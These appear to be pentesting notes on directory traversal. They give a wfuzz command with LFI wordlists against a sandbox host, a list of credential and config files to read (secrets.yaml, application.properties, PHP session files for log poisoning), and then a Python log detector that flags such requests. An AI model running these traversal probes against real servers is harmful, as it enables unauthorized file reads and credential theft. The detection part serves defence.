1. To use wfuzz to fuzz for possible directory traversal (in the example below, hide 404 responses and hide responses of 81 or 125 characters):

    wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hc 404 --hh 81,125 "http://dirTravSandbox/relativePathing.php?path=../../../../../../../../../../../../FUZZ"

Alternative wordlists to try:

    /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt
    /usr/share/seclists/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt

Filter options:

    --hs/ss "regex"  # Hide/Show by regex match in the response
                     # Simple example, match a string: "Invalid username"
                     # Regex example: "Invalid *"
    --hc/sc CODE     # Hide/Show by response code
    --hl/sl NUM      # Hide/Show by number of lines in response
    --hw/sw NUM      # Hide/Show by number of words in response
    --hh/sh NUM      # Hide/Show by number of chars in response

2. Interesting files to look at:

    /.storage/auth
    secrets.yaml

3. Spring configuration files:

    /config/application.properties
    application.properties

- PHP session file for potential log poisoning:

    /var/lib/php/sessions/sess_<snip>

  with <snip> being the current PHPSESSID cookie value.

- Apache conf file to find out web root:

    /etc/apache2/httpd.conf
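
Seen from the defending side, a fuzzing run like the one in step 1 and requests for the files listed above show up clearly in web access logs. The following is an added example, not part of the original notes: it decodes each request, flags traversal sequences and the file names from this page, and reports clients that send a burst of them. The function names, the burst threshold and the log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Files named in the notes above (substring match on the decoded request).
SENSITIVE = ("/.storage/auth", "secrets.yaml", "application.properties",
             "/var/lib/php/sessions/sess_", "/etc/apache2/httpd.conf")
# Common Log Format: client IP, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double encoding (%252e%252e%252f) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (ip, status, reasons) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group(2))
    values = [parts.path] + [v for _, v in parse_qsl(parts.query)]
    reasons = set()
    for v in map(decode_fully, values):
        if TRAVERSAL_RE.search(v):
            reasons.add("traversal")
        if any(s in v for s in SENSITIVE):
            reasons.add("sensitive-file")
    return (m.group(1), int(m.group(3)), sorted(reasons)) if reasons else None

def summarize(lines, burst_threshold=3):
    """Return (clients with >= burst_threshold hits, hits answered with 200)."""
    found = [r for r in map(classify, lines) if r]
    counts = Counter(ip for ip, _, _ in found)
    fuzzers = sorted(ip for ip, n in counts.items() if n >= burst_threshold)
    return fuzzers, [(ip, why) for ip, status, why in found if status == 200]

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /relativePathing.php?path=../../../../etc/apache2/httpd.conf HTTP/1.1" 200 1250',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /relativePathing.php?path=%252e%252e%252f%252e%252e%252fconfig/application.properties HTTP/1.1" 404 81',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /relativePathing.php?path=..%5c..%5csecrets.yaml HTTP/1.1" 404 125',
    '198.51.100.20 - - [01/Jan/2024:10:00:05 +0000] "GET /relativePathing.php?path=docs/readme.txt HTTP/1.1" 200 512',
]
```

Calling summarize(SAMPLE_LOG) returns the bursting client and the one flagged request that was answered with a 200, which is the entry to investigate first.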